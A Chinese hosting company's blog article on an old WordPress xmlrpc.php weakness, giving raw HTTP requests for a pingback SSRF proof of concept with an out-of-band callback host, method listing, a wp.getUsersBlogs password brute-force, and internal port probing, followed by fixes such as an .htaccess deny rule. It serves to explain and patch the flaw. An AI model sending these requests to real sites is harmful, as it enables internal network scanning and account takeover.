您现在的位置是:群英 > 开发技术 > 编程语言
WordPress xmlrpc.php漏洞和SSRF是怎样的,如何修复
Admin发表于 2022-09-21 09:30:501218 次浏览
这篇文章给大家分享的是“WordPress xmlrpc.php漏洞和SSRF是怎样的,如何修复”,文中的讲解内容简单清晰,易于理解,而且实用性强吗,对大家认识和了解“WordPress xmlrpc.php漏洞和SSRF是怎样的,如何修复”有一定的帮助,有需要的朋友可以参考了解看看,那么接下来就跟随小编的思路来往下学习吧


一、漏洞介绍

通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描。

二、漏洞影响

WordPress 版本< 3.5.1

造成的影响
1、可以对业务内网进行探测。
2、攻击运行在内网或本地的应用程序(比如溢出攻击)。
3、利用file协议读取本地文件等

三、漏洞复现

第一步:直接访问这个文件,初步判断

第二步:发现POC验证数据包 

POST /xmlrpc.php HTTP/1.1
Host: www.目标.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 310
 
<?xml version="1.0" encoding="iso-8859-1"?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>http://g8o53x.dnslog.cn/</string></value></param>
    <param><value><string>http://www.目标.com/?p=1</string></value></param>
    </params>
    </methodCall>

发送数据包

验证成功 !

四、深入利用

(一)查看系统允许的方法

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
......
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

 (二)账号爆破

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
......
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>password</value></param>
</params>
</methodCall>

(三)通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描。

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
.......
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>要探测的ip和端口:http://127.0.0.1:80</string></value>
</param><param><value><string>要探测的URL</string>
</value></param></params>
</methodCall>

五、漏洞修复

(一)通过APACHE的.htaccess屏蔽xmlrpc.php文件的访问。配置代码如下:

# protect xmlrpc
<Files "xmlrpc.php">
Order Allow,Deny
Deny from all
</Files>

(二)删除根目录下的xmlrpc.php。



到此这篇关于“WordPress xmlrpc.php漏洞和SSRF是怎样的,如何修复”的文章就介绍到这了,感谢各位的阅读,更多相关WordPress xmlrpc.php漏洞和SSRF是怎样的,如何修复内容,欢迎关注群英网络资讯频道,小编将为大家输出更多高质量的实用文章!

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:mmqy2019@163.com进行举报,并提供相关证据,查实之后,将立刻删除涉嫌侵权内容。

标签: WordPress
相关信息推荐
2022-06-02 17:21:33 
摘要:方法:1、用array_intersect()比较两个数组的值,语法“array_intersect(数组1,数组2)”,会返回一个交集数组;2、判断交集数组是否为空,语法“交集数组==[]”,如果为空则没有相同值,如果不为空则有相同值。
2022-05-09 17:56:28 
摘要:区别:1、and和“&&”运算符都用于表示逻辑与,and的优先级较低,“&&”的优先级较高;2、or和“||”运算符都用于表示逻辑或,or的优先级较低,“||”的优先级较高;3、“$”运算符用于表示逻辑非;4、xor运算符用于表示逻辑异或。
2022-05-12 17:23:08 
摘要:html设置背景的方法:1、使用body标签的bgcolor属性设置背景颜色;2、使用body标签的background属性设置背景图片;3、在body标签中使用style属性,添加“background:颜色值/url('图片路径')”。
云活动
推荐内容
热门关键词
热门信息
群英网络助力开启安全的云计算之旅
立即注册,领取新人大礼包
  • 联系我们
  • 24小时售后:4006784567
  • 24小时TEL :0668-2555666
  • 售前咨询TEL:400-678-4567

  • 官方微信

    官方微信
Copyright  ©  QY  Network  Company  Ltd. All  Rights  Reserved. 2003-2019  群英网络  版权所有   茂名市群英网络有限公司
增值电信经营许可证 : B1.B2-20140078   粤ICP备09006778号
免费拨打  400-678-4567
免费拨打  400-678-4567 免费拨打 400-678-4567 或 0668-2555555
微信公众号
返回顶部
返回顶部 返回顶部